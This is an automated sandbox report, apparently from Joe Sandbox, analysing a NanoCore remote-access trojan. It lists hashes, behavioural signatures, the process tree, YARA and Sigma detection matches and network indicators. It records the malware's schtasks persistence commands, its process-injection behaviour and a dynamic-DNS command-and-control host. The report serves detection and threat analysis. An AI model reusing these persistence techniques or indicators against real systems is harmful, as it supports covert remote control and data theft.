Windows Analysis Report dUzAkYsvl8.exe

Overview

General Information

Sample Name: dUzAkYsvl8.exe
Analysis ID: 500304
MD5: 9a4a8643db95a8c0fe52af8675a5d1b1
SHA1: c6beb75cbc168f9224ace74c0dcfb29df6197e82
SHA256: b4e2d864ec03943310548bfbc963a0848bd08e088429c5ce05759face5d380d2
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Process Tree

  • System is w10x64
  • dUzAkYsvl8.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\dUzAkYsvl8.exe' MD5: 9A4A8643DB95A8C0FE52AF8675A5D1B1)
    • cjlaro.pif (PID: 5028 cmdline: 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 6364 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
        • schtasks.exe (PID: 5252 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1240 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cjlaro.pif (PID: 2132 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
  • RegSvcs.exe (PID: 6748 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 6836 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cjlaro.pif (PID: 7152 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • RegSvcs.exe (PID: 3676 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 3460 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cjlaro.pif (PID: 3016 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
    • cjlaro.pif (PID: 4504 cmdline: 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr MD5: 279DAE7236F5F2488A4BACDE6027F730)
      • RegSvcs.exe (PID: 4968 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 4580 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xfddd:$x1: NanoCore.ClientPluginHost
  • 0xfe1a:$x2: IClientNetworkHost
  • 0x1394d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0xfb45:$a: NanoCore
    • 0xfb55:$a: NanoCore
    • 0xfd89:$a: NanoCore
    • 0xfd9d:$a: NanoCore
    • 0xfddd:$a: NanoCore
    • 0xfba4:$b: ClientPlugin
    • 0xfda6:$b: ClientPlugin
    • 0xfde6:$b: ClientPlugin
    • 0xfccb:$c: ProjectData
    • 0x106d2:$d: DESCrypto
    • 0x1809e:$e: KeepAlive
    • 0x1608c:$g: LogClientMessage
    • 0x12287:$i: get_Connected
    • 0x10a08:$j: #=q
    • 0x10a38:$j: #=q
    • 0x10a54:$j: #=q
    • 0x10a84:$j: #=q
    • 0x10aa0:$j: #=q
    • 0x10abc:$j: #=q
    • 0x10aec:$j: #=q
    • 0x10b08:$j: #=q

    Unpacked PEs

    Source | Rule | Description | Author | Strings
    5.2.RegSvcs.exe.2a67f10.2.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0x40a6:$x1: NanoCore.ClientPluginHost
    5.2.RegSvcs.exe.2a67f10.2.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
    • 0x40a6:$x2: NanoCore.ClientPluginHost
    • 0x4184:$s4: PipeCreated
    • 0x40c0:$s5: IClientLoggingHost
    5.2.RegSvcs.exe.3a807ce.3.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0x4083:$x1: NanoCore.ClientPluginHost
    5.2.RegSvcs.exe.3a807ce.3.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
    • 0x4083:$x2: NanoCore.ClientPluginHost
    • 0x4161:$s4: PipeCreated
    • 0x409d:$s5: IClientLoggingHost
    20.3.cjlaro.pif.48ce458.0.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

    Sigma Overview

    AV Detection:

    Sigma detected: NanoCore
    Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    E-Banking Fraud:

    Sigma detected: NanoCore
    Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    System Summary:

    Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
    Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr, ParentImage: C:\Users\user\77066510\cjlaro.pif, ParentProcessId: 5028, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364
    Sigma detected: Possible Applocker Bypass
    Source: Process started, Author: juju4, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr, ParentImage: C:\Users\user\77066510\cjlaro.pif, ParentProcessId: 5028, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364

    Stealing of Sensitive Information:

    Sigma detected: NanoCore
    Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Remote Access Functionality:

    Sigma detected: NanoCore
    Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Jbx Signature Overview

    AV Detection:

    Yara detected Nanocore RAT
    Source: Yara match, File source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara match, File source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Multi AV Scanner detection for submitted file
    Source: dUzAkYsvl8.exe, Virustotal: Detection: 52%
    Source: dUzAkYsvl8.exe, ReversingLabs: Detection: 55%
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\77066510\cjlaro.pif, Metadefender: Detection: 37%
    Source: C:\Users\user\77066510\cjlaro.pif, ReversingLabs: Detection: 55%
    Machine Learning detection for sample
    Source: dUzAkYsvl8.exe, Joe Sandbox ML: detected
    Machine Learning detection for dropped file
    Source: C:\Users\user\77066510\cjlaro.pif, Joe Sandbox ML: detected
    Source: 5.2.RegSvcs.exe.500000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
    Source: 5.2.RegSvcs.exe.61b0000.8.unpack, Avira: Label: TR/NanoCore.fadte
    Source: dUzAkYsvl8.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: dUzAkYsvl8.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dUzAkYsvl8.exe, 00000000.00000000.289072563.0000000000222000.00000002.00020000.sdmp
    Source: Binary string: RegSvcs.pdb, source: dhcpmon.exe, 00000010.00000002.347719934.0000000000D32000.00000002.00020000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp
    Source: Binary string: RegSvcs.pdb source: dhcpmon.exe

    Networking:

    Connects to many ports of the same IP (likely port scanning)
    Source: global traffic, TCP traffic: 185.19.85.175 ports 2,4,5,6,8,48562
    Source: global traffic, TCP traffic: 197.210.84.227 ports 2,4,5,6,8,48562
    Uses dynamic DNS services
    Source: unknown, DNS query: name: strongodss.ddns.net
    Source: global traffic, TCP traffic: 192.168.2.3:49746 -> 197.210.84.227:48562
    Source: global traffic, TCP traffic: 192.168.2.3:49764 -> 185.19.85.175:48562
    Source: RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmp, String found in binary or memory: http://crl.micrH
    Source: RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmp, String found in binary or memory: http://crl.microsof
    Source: RegSvcs.exe, 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: cjlaro.pif, 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 0000000A.00000002.337157263.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 00000014.00000000.348819086.00000000011DB000.00000002.00020000.sdmp, String found in binary or memory: http://www.onnodb.com/aetraymenuH(
    Source: unknown, DNS traffic detected: queries for: strongodss.ddns.net
    Source: C:\Users\user\77066510\cjlaro.pif, Code function: 4_2_01172361 InternetReadFile,4_2_01172361
    Source: unknown, TCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 4_2_01186308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,4_2_01186308
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 4_2_0118A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0118A0FC
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 4_2_0119D8E9 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,LdrInitializeThunk,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_0119D8E9
    Source: cjlaro.pif, 00000004.00000002.334930499.000000000194A000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: RegSvcs.exe, 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp; Binary or memory string: RegisterRawInputDevices
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 4_2_011AC7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_011AC7D6
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 10_2_011AC7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_011AC7D6

    E-Banking Fraud:

    Yara detected Nanocore RAT

    Operating System Destruction:

    Protects its processes via BreakOnTermination flag
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Process information set: 01 00 00 00

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 5.2.RegSvcs.exe.2a67f10.2.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.3a807ce.3.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
    Source: C:\Users\user\77066510\cjlaro.pif, Code function: 4_2_01176219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
    Source: cjlaro.pif.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe, Section loaded: dxgidebug.dll
    Source: dUzAkYsvl8.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: 5.2.RegSvcs.exe.2a67f10.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.2a67f10.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a807ce.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a807ce.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.6110000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.6110000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
